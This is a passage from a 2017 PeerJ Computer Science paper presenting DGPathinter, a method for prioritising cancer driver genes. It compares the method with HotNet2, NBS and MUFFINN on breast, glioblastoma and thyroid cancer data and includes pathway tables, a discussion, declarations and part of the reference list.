NCG4.0 benchmarking cancer genes. Furthermore, we investigate the numbers of selected top 100 genes that are also CGC experimentally validated driver genes. For BRCA data, there are 10, 1, 6 CGC driver genes detected by DGPathinter, HotNet2 and NBS, with # gene 0 8 16 24 32 40 D G P at hi nt er H ot N et 2 N B S M U FF IN N -D N m ax M U FF IN N -D N su m p=6.88e-15 p=2.01e-01 p=6.95e-08 p=1.00e-00 p=1.00e-00 p=1.13e-24 p=7.40e-01 p=2.33e-08 p=1.04e-01 p=3.18e-01 BRCA # gene 0 4 8 12 16 20 D G P at hi nt er H ot N et 2 N B S M U FF IN N -D N m ax M U FF IN N -D N su m p=5.57e-15 p=6.57e-13 p=4.63e-09 p=1.39e-01 p=1.39e-01 p=3.63e-14 p=1.01e-12 p=1.91e-07 p=4.68e-01 p=4.68e-01 GBM # gene 0 1 2 3 4 5 D G P at hi nt er H ot N et 2 N B S M U FF IN N -D N m ax M U FF IN N -D N su m p=4.07e-05 p=1.65e-02 p=9.71e-04 p=1.00e-00 p=1.00e-00 p=5.66e-05 p=1.92e-02 p=1.23e-03 p=1.00e-00 p=1.00e-00 THCAa b c Figure 3 Bar plot of numbers of known cancer specific driver genes that are selected in the top 100 genes among the competing prioritization results, for (a) BRCA, (b) GBM and (c) THCA respectively. The dark blue bars represent the number of CGC genes (Futreal et al., 2004), and the light blue bars represent the number of statistically inferred candidates genes in NCG4.0 (including both CGC genes and statistically inferred genes) (An et al., 2014). The dark red texts at the top of the dark blue bars indicate the p values of Fisher’s exact test on the selected genes for cancer specific CGC gene, while the dark green texts at the top of the light blue bars represent the p values for cancer-specific NCG4.0 genes. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 12/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ p values of 6.88e-15, 2.01e-01 and 6.95e-08 respectively. For GBM datasets, there are nine CGC genes captured by DGPathinter, of which the Fisher’s exact test p value is 5.57e-15 and is smaller than those of other investigated methods (eight CGC genes for HotNet2 with p value of 6.57e-13, six CGC genes for NBS with p value of 4.43-e09 and one CGC gene for both MUFFINN-DNmax and MUFFINN-DNsum with p values of 1.39e-01). For THCA-specific driver genes detected by the competing methods, the NCG4.0 genes completely overlap the CGC genes, and it can be observed that DGPathinter achieves the best performance among the competing methods. When we apply the Friedman test on the proportions of known NCG4.0 and CGC genes in the top 100 genes detected by DGPathinter on the investigated cancers, we obtain p values of 0.05 and 0.02 respectively. We further change the number of top-ranked genes considered to see how the changes affect the results of the statistical test. For the proportions of known NCG4.0 and CGC genes in the top 200 genes of the results of the competing methods, the p values of Friedman test are 0.04 and 0.02 respectively; for the top 300 genes, the p values are 0.03 for known NCG4.0 genes and 0.02 for known CGC genes. These results demonstrate that there is a statistically significant difference between the performance of the competing methods. Furthermore, we compare the top 100 genes among the five prioritization results and draw Venn diagram of their results for three types of cancers respectively (Fig. 4). For BRCA dataset, 14 genes identified by DGPathinter are also detected by at least of one of the other results. For example, GATA3 gene is identified by DGPathinter, HotNet2 and NBS. As reported in a previous study (Usary et al., 2004), variants in GATA3 gene may have contribution to tumorigenesis in ESR1-positive breast cancers. Another study also shows that GATA3 mutations have the potential to be associated with aberrant nuclear localization, reduced transactivation and cell invasiveness in breast cancers (Gaynor et al., 2013). For GBM dataset, there are totally 16 genes shared in the detection 83 6 7 0 2 2 0 0 0 0 0 00 0 0 0 84 88 91 93 1 6 0 1 0 0 0 2 1 1 0 DG Pa thi nte r HotNet2 N B S MUF FIN N-D Nma x M UFFINN-DNsum 86 5 7 1 0 1 0 0 0 0 0 00 0 0 0 88 90 93 98 1 4 0 1 0 0 0 1 0 0 1 DG Pa thi nte r HotNet2 N B S MUF FIN N-D Nma x M UFFINN-DNsum 43 20 5 0 6 16 0 0 4 0 0 03 0 3 0 4 70 69 48 1 0 0 6 0 5 1 21 2 1 1 DG Pa thi nte r HotNet2 N B S MUF FIN N-D Nma x M UFFINN-DNsum BRCA GBM THCA a b c Figure 4 Venn diagrams of the top 100 genes in the results of DGPathinter (blue circle), HotNet2 (dark green circle) and NBS (light green circle), MUFFINN-DNmax (dark red circle) and MUFFINN-DNmax (violet circle) on (a) BRCA, (b) GBM and (c) THCA datasets. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 13/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ results of DGPathinter, HotNet2 and NBS, including CGC curated GBM specific driver genes TP53, PTEN, PIK3R1, EGFR and PIK3CA (Futreal et al., 2004), and NCG4.0 inferred GBM specific driver candidates ERBB2 and RB1 (An et al., 2014). For THCA dataset, HRAS is co-detected by DGPathinter, HotNet2 and NBS. Although HRAS is not a THCA specific driver gene curated by neither CGC nor NCG4.0, it is reported as driver gene for infrequent sarcomas and some other rare tumor types by CGC (Futreal et al., 2004). Moreover, some genes detected by DGPathinter are also captured by MUFFINN- DNmax or MUFFINN-DNsum. Taking GBM results as an example, MDM4 gene is shared by the results of DGPathinter, MUFFINN-DNmax and MUFFINN-DNsum, which is reported to be the driver gene in bladder cancer, glioblastoma and retinoblastoma by CGC (Futreal et al., 2004). The KRAS gene is identified by DGPathinter, HotNet2 and MUFFINN-DNsum, which is also a driver gene in several types of cancers reported by CGC (Futreal et al., 2004). The FLT4 gene is included in the results of DGPathinter, NBS and MUFFINN-DNsum, and is curated as a driver gene of soft tissue sarcoma by CGC (Futreal et al., 2004). In addition to the genes shared by DGPathinter and other methods, there are also some genes unique to the results of DGPathinter. For example, TSH gene is a breast cancer driver gene curated by CGC, which is only detected by DGPathinter on the BRCA dataset. A number of CGC curated GBM specific driver genes, including AKT1, CDH1, MAP2K4, NCOR1 and TBX3 (Futreal et al., 2004), are also unique to the results of DGPathinter on the GBM dataset. For the results of THCA dataset, the CGC-curated THCA specific driver gene TERT is only identified by DGPathinter but not the other competing methods (Futreal et al., 2004). The full lists of the top 100 genes detected by DGPathinter on BRCA, GBM and TCHA, along with the methods that co-detect them, are demonstrated in Tables S2–S4, respectively. Pathway analysis In addition to driver gene identification, DGPathinter can also provide highly scored pathways during the driver gene detection processing. We further analyze the top 30 scored pathways in the results of DGPathinter, and find some well-known cancer related pathways such as P53 pathway, PTEN pathway, P38MAPK events pathway, ATM pathway (Table 3). In the results of the BRCA dataset, the top one pathway is the GATA3 pathway curated by the BIOCARTA database, which is reported to be highly associated with breast cancer. For example, the GATA3 pathway is reported to play an important role in reducing E-cadherin in breast cancer tissues (Tu et al., 2017). Meanwhile, the top ranked pathway in the GBM results is the RB pathway curated by BIOCARTA, which is also found in the BRCA results. Reported by previous studies (Chow et al., 2011; Sherr & McCormick, 2002), mutated RB1 pathway is one of the obligate events in the pathogenesis of glioblastomas. Especially, thyroid cancer pathway is found in the results of DGPathinter on THCA dataset, and glioma pathway is in the results on the GBM dataset. Some other cancer-related pathways are also included in the lists of top ranked pathways, such as the GAB1 signalosome pathway, the signaling to RAS, the Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 14/25 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ MTOR signaling pathway, the non-small cell lung cancer pathway, the melanoma pathway, the pancreatic cancer pathway, the prostate cancer pathway, the bladder cancer pathway and the endometrial cancer pathway. Table 3 Top 30 scored pathways in the results of DGPathinter on somatic mutation datasets of BRCA, GBM and THCA. Rank BRCA GBM THCA 1 BIOCARTA GATA3 PATHWAY BIOCARTA RB PATHWAY REACTOME SHC MEDIATED SIGNALLING 2 BIOCARTA RNA PATHWAY BIOCARTA RNA PATHWAY REACTOME SOS MEDIATED SIGNALLING 3 REACTOME GAB1 SIGNALOSOME BIOCARTA ARF PATHWAY REACTOME P38MAPK EVENTS 4 BIOCARTA ARF PATHWAY BIOCARTA TEL PATHWAY REACTOME GRB2 EVENTS IN EGFR SIGNALING 5 BIOCARTA TRKA PATHWAY BIOCARTA P53 PATHWAY REACTOME SIGNALLING TO P38 VIA RIT AND RIN 6 BIOCARTA HCMV PATHWAY BIOCARTA CTCF PATHWAY REACTOME SHC RELATED EVENTS 7 BIOCARTA RB PATHWAY BIOCARTA PML PATHWAY BIOCARTA VITCB PATHWAY 8 BIOCARTA LONGEVITY PATHWAY BIOCARTA TID PATHWAY REACTOME FRS2 MEDIATED ACTIVATION 9 BIOCARTA CTCF PATHWAY BIOCARTA PTEN PATHWAY REACTOME PURINE RIBONUCLEOSIDE MONOPHOSPHATE BIOSYNTHESIS 10 BIOCARTA ACH PATHWAY REACTOME SEMA4D INDUCED CELL MIGRATION AND GROWTH CONE COLLAPSE BIOCARTA IL3 PATHWAY 11 BIOCARTA GCR PATHWAY BIOCARTA P53HYPOXIA PATHWAY BIOCARTA ACE2 PATHWAY 12 BIOCARTA GLEEVEC PATHWAY BIOCARTA ATRBRCA PATHWAY REACTOME TIE2 SIGNALING 13 BIOCARTA BCELLSURVIVAL PATHWAY BIOCARTA IGF1MTOR PATHWAY BIOCARTA PLATELETAPP PATHWAY 14 BIOCARTA CDC42RAC PATHWAY REACTOME GAB1 SIGNALOSOME REACTOME SIGNALLING TO RAS 15 BIOCARTA P53 PATHWAY BIOCARTA ATM PATHWAY KEGG ETHER LIPID METABOLISM 16 BIOCARTA IL7 PATHWAY BIOCARTA G1 PATHWAY KEGG THYROID CANCER 17 BIOCARTA RAC1 PATHWAY REACTOME SEMA4D IN SEMAPHORIN SIGNALING BIOCARTA AMI PATHWAY 18 BIOCARTA ERK5 PATHWAY BIOCARTA G2 PATHWAY REACTOME SIGNALLING TO ERKS 19 BIOCARTA CTLA4 PATHWAY BIOCARTA CHEMICAL PATHWAY BIOCARTA INTRINSIC PATHWAY 20 BIOCARTA PTEN PATHWAY KEGG ENDOMETRIAL CANCER KEGG PENTOSE PHOSPHATE PATHWAY 21 BIOCARTA PML PATHWAY BIOCARTA MTOR PATHWAY REACTOME DOWN STREAM SIGNAL TRANSDUCTION 22 BIOCARTA NGF PATHWAY KEGG BLADDER CANCER REACTOME PURINE METABOLISM 23 REACTOME TIE2 SIGNALING BIOCARTA EIF4 PATHWAY BIOCARTA BAD PATHWAY 24 BIOCARTA ATM PATHWAY KEGG NON SMALL CELL LUNG CANCER KEGG GLYCEROPHOSPHOLIPID METABOLISM 25 BIOCARTA ATRBRCA PATHWAY KEGG GLIOMA KEGG BLADDER CANCER 26 BIOCARTA TEL PATHWAY KEGG MELANOMA KEGG TYROSINE METABOLISM 27 BIOCARTA TID PATHWAY KEGG PANCREATIC CANCER KEGG ALANINE ASPARTATE AND GLUTAMATE METABOLISM 28 BIOCARTA IGF1MTOR PATHWAY KEGG PROSTATE CANCER KEGG MTOR SIGNALING PATHWAY 29 REACTOME CD28 DEPENDENT PI3K AKT SIGNALING BIOCARTA MET PATHWAY KEGG ENDOMETRIAL CANCER 30 REACTOME FURTHER PLATELET RELEASATE REACTOME PI3K AKT SIGNALLING REACTOME SIGNALING BY EGFR Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 15/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ DISCUSSION In this paper, we propose a knowledge-driven matrix factorization framework called DGPathinter to identify driver genes from mutation data with prior knowledge from interactome and pathways incorporated. The knowledge of pathways is incorporated by maximizing the correlation between the pathway scores and their relations of mutation scores (Chen & Zhang, 2016). Meanwhile, the knowledge of interactome is utilized by graph Laplacian regularization with the gene interaction network. To integrate the information from pathways, interactome and mutation data, matrix factorization framework is adopted, which can also help addressing the problem of tumor sample heterogeneity. When comparing DGPathinter with three existing methods on three TCGA cancer mutation datasets (BRCA, GBM and THCA), we observe that DGPathinter achieves better performance than the other competing methods on precision–recall curves. The average ranks of known driver genes prioritized by DGPathinter are also smaller than those of the other existing methods. The top ranked genes detected by DGPathinter are highly enriched for the known driver genes when analyzed by Fisher’s exact test, and the p values for DGPathinter are also more significant than those of the other investigated methods. While some known driver genes are shared in the detection results of DGPathinter and the existing methods, DGPathinter also identifies some known driver genes that are not detected by the other investigated methods. In addition, most of the top ranked scored pathways in the results of DGPathinter are cancer progression- associated pathways. The promising performance of DGPathinter in the identification of driver genes may be due to three potential reasons. First, prior knowledge from pathways is important for understanding the roles of genes in tumors (Parsons et al., 2008; Cancer Genome Atlas Research Network, 2008; Vaske et al., 2010), and incorporating information from pathways has the potential of promoting the detection power of driver genes. Second, since the cooperatively dysregulated genes are correlated with cancer formation and progression (Vandin, Upfal & Raphael, 2011; Leiserson et al., 2014; Hofree et al., 2013; Cho et al., 2016), gene interaction network information from interactome can help in determining the influence of somatic mutations between the interacted genes. Third, the sample heterogeneity issue that driver genes may mutate in different samples is reported as a confounding factor in driver gene identification (Cancer Genome Atlas Network, 2012), and matrix factorization framework is capable of analyzing heterogeneous samples (Lee et al., 2010; Sill et al., 2011; Xi & Li, 2016). To investigate the individual contribution of network information or pathway information on the performance of our method, we calculate the results with only the network information, the results with only the pathway information and the results with no prior information (i.e., matrix factorization) by removing the two terms of pathway information, the term of network regularization and all the three terms of prior information respectively. Through the evaluation results in Figs. S5 and S6, we can see that the results with prior information from both network and pathways achieve better performance than the results with only network information, the results with only pathway information, and the results with no Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 16/25 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ prior information. These comparison results indicate that the detection results of our methods are contributed by the prior knowledge coming from networks and pathways. Note that the previous network-based methods can incorporate pathway information when they use network that contains interaction data derived from pathway databases, such as public molecular interaction database STRING. In comparison, iRefIndex is an interaction database that only assembles data from other primary interaction databases, but does not provide the coverage of pathway interactions that is offered by STRING. Therefore, we compare our method against the previous network-based approaches by using STRING instead of iRefIndex. The comparison results with the usage of STRING are evaluated by precision–recall curves (Fig. S7 for CGC and S8 for NCG4.0), the average ranks of known cancer genes (Table S5 for CGC and NCG4.0) and the proportions of known cancer genes in the top 100 genes with p values of Fisher’s exact test (Fig. S9 for CGC and NCG4.0). We observe that the performance of HotNet2 and MUFFINN-DNsum with STRING are increased when compared with their performance with iRefindex. This phenomenon may be due to the fact that iRefIndex does not provide the coverage of pathway interactions that is offered by STRING. For DGPathinter, the detection results still outperform those of the other network-based methods when STRING is used. When we further apply the statistical validation on the detection results of these competing methods with STRING, the validation results of the Friedman test demonstrate that the difference between the detection results of the investigated methods is statistically significant (details in Supplemental information). Consequently, our approach provides an added value over previous network-based approaches through the use of information on pathway boundaries, which is not explicitly included in STRING. Despite the achievement, there are also some questions for further investigation. Since there seems to be a bias among network-based driver gene identification methods where hot nodes and their neighbors are always identified as candidate drivers, we further investigate how many of the top 100 DGPathinter-output genes are neighbors of TP53. For BRCA, GBM and THCA, the numbers of the top 100 genes detected by DGPathinter that are also neighbors of TP53 are 8, 18 and 9, respectively, which is much less than 427 (the number of neighbors of TP53 in iRefIndex). Accordingly, it seems that the results of DGPathinter are less affected by the bias among network-based driver gene identification methods. Furthermore, there is a possibility that some genes may contain both driver and passenger mutations, and this problem is not addressed in the experimental design in our work. The current approach focuses on gene-level predictions, and it cannot yet make predictions at the level of individual mutations. In Fig. S5, using network information does not change the performance for the datasets of the three types of cancers. When we further investigate this phenomenon, we find that some non-benchmarking genes included in top ranked genes in the result with network information are different than those in the result with no prior information, although the known benchmarking genes included in the two results are the same. In addition, a possible expansion to DGPathinter would be to integrate multi-omic data from not only mutations but also from copy number alternation, gene expression and DNA methylation of genes, which also play Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 17/25 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133#supplemental-information http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ important roles in activating oncogenes and inactivating tumor suppressors (Yang et al., 2017). Another interesting topic for future work is to generalize the framework of DGPathinter to pan-cancer analysis, in which the samples of numerous different cancer types is combined as one large dataset and some driver genes across many types of cancers will be identified in this case (Leiserson et al., 2014). In conclusion, DGPathinter is an efficient method for prioritizing driver genes, and yields a sophisticated perspective of cancer genome by utilizing prior knowledge from interactome and pathways. ACKNOWLEDGEMENTS We would like to thank Changran Zhang and the anonymous reviewers for insight and help with revisions of this manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the National Natural Science Foundation of China (Nos. 61571414, 61471331 and 31100955). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Natural Science Foundation of China: 61571414, 61471331 and 31100955. Competing Interests The authors declare that they have no competing interests. Author Contributions � Jianing Xi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � Minghui Wang conceived and designed the experiments, analyzed the data and reviewed drafts of the paper. � Ao Li wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/USTC-HIlab/DGPathinter Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.133#supplemental-information. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 18/25 https://github.com/USTC-HIlab/DGPathinter http://dx.doi.org/10.7717/peerj-cs.133#supplemental-information http://dx.doi.org/10.7717/peerj-cs.133#supplemental-information http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ REFERENCES An O, Pendino V, D’Antonio M, Ratti E, Gentilini M, Ciccarelli FD. 2014. NCG 4.0: the network of cancer genes in the era of massive mutational screenings of cancer genomes. Database 2014: bau015 DOI 10.1093/database/bau015. Bashashati A, Haffari G, Ding J, Ha G, Lui K, Rosner J, Huntsman DG, Caldas C, Aparicio SA, Shah SP. 2012. DriverNet: uncovering the impact of somatic driver mutations on transcriptional networks in cancer. Genome Biology 13(12):R124 DOI 10.1186/gb-2012-13-12-r124. Bertrand D, Chng KR, Sherbaf FG, Kiesel A, Chia BKH, Sia YY, Huang SK, Hoon DSB, Liu ET, Hillmer A, Nagarajan N. 2015. Patient-specific driver gene prediction and risk assessment through integrated network analysis of cancer omics profiles. Nucleic Acids Research 43(7): e44–e44 DOI 10.1093/nar/gku1393. Cancer Genome Atlas Network. 2012. Comprehensive molecular portraits of human breast tumours. Nature 490(7418):61–70 DOI 10.1038/nature11412. Cancer Genome Atlas Research Network. 2008. Comprehensive genomic characterization defines human glioblastoma genes and core pathways. Nature 455(7216):1061 DOI 10.1038/nature07385. Cancer Genome Atlas Research Network. 2014. Integrated genomic characterization of papillary thyroid carcinoma. Cell 159(3):676–690 DOI 10.1016/j.cell.2014.09.050. Chen J, Zhang S. 2016. Integrative analysis for identifying joint modular patterns of gene- expression and drug-response data. Bioinformatics 32(11):1724–1732 DOI 10.1093/bioinformatics/btw059. Cho A, Shim JE, Kim E, Supek F, Lehner B, Lee I. 2016. MUFFINN: cancer gene discovery via network analysis of somatic mutation data. Genome Biology 17(1):129 DOI 10.1186/s13059-016-0989-x. Chow LM, Endersby R, Zhu X, Rankin S, Qu C, Zhang J, Broniscer A, Ellison DW, Baker SJ. 2011. Cooperativity within and among Pten, p53, and Rb pathways induces high-grade astrocytoma in adult brain. Cancer Cell 19(3):305–316 DOI 10.1016/j.ccr.2011.01.039. Das J, Yu H. 2012. HINT: high-quality protein interactomes and their applications in understanding human disease. BMC Systems Biology 6(1):92 DOI 10.1186/1752-0509-6-92. Dees ND, Zhang Q, Kandoth C, Wendl MC, Schierding W, Koboldt DC, Mooney TB, Callaway MB, Dooling D, Mardis ER, Wilson RK, Ding L. 2012. MuSiC: identifying mutational significance in cancer genomes. Genome Research 22(8):1589–1598 DOI 10.1101/gr.134635.111. Futreal PA, Coin L, Marshall M, Down T, Hubbard T, Wooster R, Rahman N, Stratton MR. 2004. A census of human cancer genes. Nature Reviews Cancer 4(3):177–183 DOI 10.1038/nrc1299. Gao J, Aksoy BA, Dogrusoz U, Dresdner G, Gross B, Sumer SO, Sun Y, Jacobsen A, Sinha R, Larsson E, Cerami E, Sander C, Schultz N. 2013. Integrative analysis of complex cancer genomics and clinical profiles using the cBioPortal. Science Signaling 6(269):pl1 DOI 10.1126/scisignal.2004088. Gargi U, Kasturi R. 1999. Image database querying using a multi-scale localized color representation. In Proceedings IEEE Workshop on Content-Based Access of Image and Video Libraries (CBAIVL’99). Piscataway: IEEE, 28–32. Gaynor KU, Grigorieva IV, Allen MD, Esapa CT, Head RA, Gopinath P, Christie PT, Nesbit MA, Jones JL, Thakker RV. 2013. GATA3 mutations found in breast cancers may be associated with Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 19/25 http://dx.doi.org/10.1093/database/bau015 http://dx.doi.org/10.1186/gb-2012-13-12-r124 http://dx.doi.org/10.1093/nar/gku1393 http://dx.doi.org/10.1038/nature11412 http://dx.doi.org/10.1038/nature07385 http://dx.doi.org/10.1016/j.cell.2014.09.050 http://dx.doi.org/10.1093/bioinformatics/btw059 http://dx.doi.org/10.1186/s13059-016-0989-x http://dx.doi.org/10.1016/j.ccr.2011.01.039 http://dx.doi.org/10.1186/1752-0509-6-92 http://dx.doi.org/10.1101/gr.134635.111 http://dx.doi.org/10.1038/nrc1299 http://dx.doi.org/10.1126/scisignal.2004088 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ aberrant nuclear localization, reduced transactivation and cell invasiveness. Hormones and Cancer 4(3):123–139 DOI 10.1007/s12672-013-0138-x. Hofree M, Shen JP, Carter H, Gross A, Ideker T. 2013. Network-based stratification of tumor mutations. Nature Methods 10(11):1108–1115 DOI 10.1038/nmeth.2651. Hou JP, Ma J. 2014. DawnRank: discovering personalized driver genes in cancer. Genome Medicine 6(7):56 DOI 10.1186/s13073-014-0056-8. Hua X, Xu H, Yang Y, Zhu J, Liu P, Lu Y. 2013. DrGaP: a powerful tool for identifying driver genes and pathways in cancer sequencing studies. American Journal of Human Genetics 93(3):439–451 DOI 10.1016/j.ajhg.2013.07.003. Hudson TJ, Anderson W, Aretz A, Barker AD, Bell C, Bernabé RR, Bhan MK, Calvo F, Eerola I, Gerhard DS, Guttmacher A, Guyer M, Hemsley FM, Jennings JL, Kerr D, Klatt P, Kolar P, Kusada J, Lane DP, Laplace F, Youyong L, Nettekoven G, Ozenberger B, Peterson J, Rao TS, Remacle J, Schafer AJ, Shibata T, Stratton MR, Vockley JG, Watanabe K, Yang H, Yuen MM, Knoppers BM, Bobrow M, Cambon-Thomsen A, Dressler LG, Dyke SO, Joly Y, Kato K, Kennedy KL, Nicolás P, Parker MJ, Rial-Sebbag E, Romeo-Casabona CM, Shaw KM, Wallace S, Wiesner GL, Zeps N, Lichter P, Biankin AV, Chabannon C, Chin L, Clément B, de Alava E, Degos F, Ferguson ML, Geary P, Hayes DN, Hudson TJ, Johns AL, Kasprzyk A, Nakagawa H, Penny R, Piris MA, Sarin R, Scarpa A, Shibata T, van de Vijver M, Futreal PA, Aburatani H, Bayés M, Botwell DD, Campbell PJ, Estivill X, Gerhard DS, Grimmond SM, Gut I, Hirst M, López-Otı́n C, Majumder P, Marra M, McPherson JD, Nakagawa H, Ning Z, Puente XS, Ruan Y, Shibata T, Stratton MR, Stunnenberg HG, Swerdlow H, Velculescu VE, Wilson RK, Xue HH, Yang L, Spellman PT, Bader GD, Boutros PC, Campbell PJ, Flicek P, Getz G, Guigó R, Guo G, Haussler D, Heath S, Hubbard TJ, Jiang T, Jones SM, Li Q, López-Bigas N, Luo R, Muthuswamy L, Ouellette BF, Pearson JV, Puente XS, Quesada V, Raphael BJ, Sander C, Shibata T, Speed TP, Stein LD, Stuart JM, Teague JW, Totoki Y, Tsunoda T, Valencia A, Wheeler DA, Wu H, Zhao S, Zhou G, Stein LD, Guigó R, Hubbard TJ, Joly Y, Jones SM, Kasprzyk A, Lathrop M, López-Bigas N, Ouellette BF, Spellman PT, Teague JW, Thomas G, Valencia A, Yoshida T, Kennedy KL, Axton M, Dyke SO, Futreal PA, Gerhard DS, Gunter C, Guyer M, Hudson TJ, McPherson JD, Miller LJ, Ozenberger B, Shaw KM, Kasprzyk A, Stein LD, Zhang J, Haider SA, Wang J, Yung CK, Cros A, Liang Y, Gnaneshan S, Guberman J, Hsu J, Bobrow M, Chalmers DR, Hasel KW, Joly Y, Kaan TS, Kennedy KL, Knoppers BM, Lowrance WW, Masui T, Nicolás P, Rial-Sebbag E, Rodriguez LL, Vergely C, Yoshida T, Grimmond SM, Biankin AV, Bowtell DD, Cloonan N, deFazio A, Eshleman JR, Etemadmoghadam D, Gardiner BB, Kench JG, Scarpa A, Sutherland RL, Tempero MA, Waddell NJ, Wilson PJ, McPherson JD, Gallinger S, Tsao MS, Shaw PA, Petersen GM, Mukhopadhyay D, Chin L, DePinho RA, Thayer S, Muthuswamy L, Shazand K, Beck T, Sam M, Timms L, Ballin V, Lu Y, Ji J, Zhang X, Chen F, Hu X, Zhou G, Yang Q, Tian G, Zhang L, Xing X, Li X, Zhu Z, Yu Y, Yu J, Yang H, Lathrop M, Tost J, Brennan P, Holcatova I, Zaridze D, Brazma A, Egevard L, Prokhortchouk E, Banks RE, Uhlén M, Cambon-Thomsen A, Viksna J, Ponten F, Skryabin K, Stratton MR, Futreal PA, Birney E, Borg A, Børresen-Dale AL, Caldas C, Foekens JA, Martin S, Reis-Filho JS, Richardson AL, Sotiriou C, Stunnenberg HG, Thoms G, van de Vijver M, van’t Veer L, Calvo F, Birnbaum D, Blanche H, Boucher P, Boyault S, Chabannon C, Gut I, Masson-Jacquemier JD, Lathrop M, Pauporté I, Pivot X, Vincent-Salomon A, Tabone E, Theillet C, Thomas G, Tost J, Treilleux I, Calvo F, Bioulac-Sage P, Clément B, Decaens T, Degos F, Franco D, Gut I, Gut M, Heath S, Lathrop M, Samuel D, Thomas G, Zucman-Rossi J, Lichter P, Eils R, Brors B, Korbel JO, Korshunov A, Landgraf P, Lehrach H, Pfister S, Radlwimmer B, Reifenberger G, Taylor MD, von Kalle C, Majumder PP, Sarin R, Rao TS, Bhan MK, Scarpa A, Pederzoli P, Lawlor RA, Delledonne M, Bardelli A, Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 20/25 http://dx.doi.org/10.1007/s12672-013-0138-x http://dx.doi.org/10.1038/nmeth.2651 http://dx.doi.org/10.1186/s13073-014-0056-8 http://dx.doi.org/10.1016/j.ajhg.2013.07.003 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ Biankin AV, Grimmond SM, Gress T, Klimstra D, Zamboni G, Shibata T, Nakamura Y, Nakagawa H, Kusada J, Tsunoda T, Miyano S, Aburatani H, Kato K, Fujimoto A, Yoshida T, Campo E, López-Otı́n C, Estivill X, Guigó R, de Sanjosé S, Piris MA, Montserrat E, González- Dı́az M, Puente XS, Jares P, Valencia A, Himmelbauer H, Quesada V, Bea S, Stratton MR, Futreal PA, Campbell PJ, Vincent-Salomon A, Richardson AL, Reis-Filho JS, van de Vijver M, Thomas G, Masson-Jacquemier JD, Aparicio S, Borg A, Børresen-Dale AL, Caldas C, Foekens JA, Stunnenberg HG, van’t Veer L, Easton DF, Spellman PT, Martin S, Barker AD, Chin L, Collins FS, Compton CC, Ferguson ML, Gerhard DS, Getz G, Gunter C, Guttmacher A, Guyer M, Hayes DN, Lander ES, Ozenberger B, Penny R, Peterson J, Sander C, Shaw KM, Speed TP, Spellman PT, Vockley JG, Wheeler DA, Wilson RK, Hudson TJ, Chin L, Knoppers BM, Lander ES, Lichter P, Stein LD, Stratton MR, Anderson W, Barker AD, Bell C, Bobrow M, Burke W, Collins FS, Compton CC, DePinho RA, Easton DF, Futreal PA, Gerhard DS, Green AR, Guyer M, Hamilton SR, Hubbard TJ, Kallioniemi OP, Kennedy KL, Ley TJ, Liu ET, Lu Y, Majumder P, Marra M, Ozenberger B, Peterson J, Schafer AJ, Spellman PT, Stunnenberg HG, Wainwright BJ, Wilson RK, Yang H. 2010. International network of cancer genome projects. Nature 464(7291):993–998 DOI 10.1038/nature09167. Jia P, Zhao Z. 2014. VarWalker: personalized mutation network analysis of putative cancer genes from next-generation sequencing data. PLOS Computational Biology 10(2):e1003460 DOI 10.1371/journal.pcbi.1003460. Joshi-Tope G, Gillespie M, Vastrik I, D’Eustachio P, Schmidt E, de Bono B, Jassal B, Gopinath GR, Wu GR, Matthews L, Lewis S, Birney E, Stein L. 2005. Reactome: a knowledgebase of biological pathways. Nucleic Acids Research 33(suppl_1):D428–D432 DOI 10.1093/nar/gki072. Kandoth C, McLellan MD, Vandin F, Ye K, Niu B, Lu C, Xie M, Zhang Q, McMichael JF, Wyczalkowski MA, Leiserson MDM, Miller CA, Welch JS, Walter MJ, Wendl MC, Ley TJ, Wilson RK, Raphael BJ, Ding L. 2013. Mutational landscape and significance across 12 major cancer types. Nature 502(7471):333–339 DOI 10.1038/nature12634. Khurana E, Fu Y, Chen J, Gerstein M. 2013. Interpretation of genomic variants using a unified biological network approach. PLOS Computational Biology 9(3):e1002886 DOI 10.1371/journal.pcbi.1002886. Kim S, Sael L, Yu H. 2015. A mutation profile for top-k patient search exploiting Gene-Ontology and orthogonal non-negative matrix factorization. Bioinformatics 31(22):3653–3659 DOI 10.1093/bioinformatics/btv409. Lawrence MS, Stojanov P, Mermel CH, Garraway LA, Golub TR, Meyerson M, Gabriel SB, Lander ES, Getz G. 2014. Discovery and saturation analysis of cancer 